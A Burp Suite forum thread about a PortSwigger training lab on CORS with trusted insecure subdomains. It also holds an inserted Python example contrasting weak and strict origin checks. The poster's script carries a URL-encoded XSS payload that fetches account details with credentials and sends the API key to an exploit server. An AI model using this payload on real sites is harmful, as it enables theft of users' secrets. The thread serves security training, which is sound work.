Burp Suite User Forum


Faulty Lab: "CORS vulnerability with trusted insecure protocols"

Nemeses5174 | Last updated: Dec 30, 2023 03:22PM UTC

Hi, maybe there is a bug inside the laboratory "CORS vulnerability with trusted insecure protocols". The following exploit script works with Burp's Chrome:

<script> document.location = "https://stock.[LAB-ID].web-security-academy.net/?storeId=hi&productId=%27%3Cscript%3E+function+submitRequest%28%29+%7B+var+xhr+%3D+new+XMLHttpRequest%28%29%3B+xhr.open%28%22GET%22%2C+%22https%3A%5C%2F%5C%2F[LAB-ID].web-security-academy.net%5C%2FaccountDetails%22%2C+true%29%3B+xhr.withCredentials+%3D+true%3B+xhr.onload+%3D+%28%29+%3D%3E+%7B+document.location+%3D+%22https%3A%2F%2F[EXPLOIT-SERVER-ID].exploit-server.net%2F%3Fabcd%3D%22+%2B+xhr.responseText%3B+%7D%3B+xhr.send%28%29%3B+%7D+submitRequest%28%29%3B+%3C%2Fscript%3E%27" </script>

The secret admin API key will be recorded in the exploit server's log page. BUT the exploit script above does NOT work when I deliver it to the victim (the victim opens the exploit page, but the API key is not recorded in the exploit server's log page). If I use the solution code (very similar to the one above), everything works great. Maybe a bug in the laboratory? Have a good day.
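The lab's root cause is a CORS policy that trusts any subdomain of the site, including one reachable over plain HTTP (and, here, one with an XSS flaw), so a cross-origin request from that subdomain is answered with credentials. The following is an added example, not the lab's or PortSwigger's code: it places the weak origin check beside a hardened one and builds the response headers accordingly. The host name is a constructed lowercase placeholder.

```python
from urllib.parse import urlsplit

# Constructed placeholder for the lab's main host; the real lab uses a per-user ID.
SITE_HOST = "lab-id.web-security-academy.net"


def weak_allow_origin(origin: str) -> bool:
    """Weak check in the spirit of the lab: any origin whose host ends with the
    site's domain is trusted, regardless of scheme. An http:// subdomain, or a
    subdomain with an XSS flaw, therefore receives credentialed responses."""
    host = urlsplit(origin).hostname or ""
    return host == SITE_HOST or host.endswith("." + SITE_HOST)


# Hardened policy: an explicit allowlist of full https origins, nothing pattern-based.
ALLOWED_ORIGINS = frozenset({"https://" + SITE_HOST})


def strict_allow_origin(origin: str) -> bool:
    """Hardened check: exact match against the allowlist. The literal 'null'
    origin, any http:// origin and unlisted subdomains are all rejected."""
    return origin in ALLOWED_ORIGINS


def cors_headers(origin: str, strict: bool = True) -> dict:
    """Build the CORS response headers for a request carrying `origin`.
    ACAO/ACAC are emitted only for a trusted origin, and 'Vary: Origin' is
    always set so a shared cache never serves one origin's ACAO to another."""
    allowed = strict_allow_origin(origin) if strict else weak_allow_origin(origin)
    headers = {"Vary": "Origin"}
    if allowed:
        headers["Access-Control-Allow-Origin"] = origin
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers
```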

Ben, PortSwigger Agent | Last updated: Jan 09, 2024 09:39AM UTC

Hi, to confirm, does your exploit work when you use the 'View exploit' functionality, i.e. you land on the log page and your user's API key is in the URL?
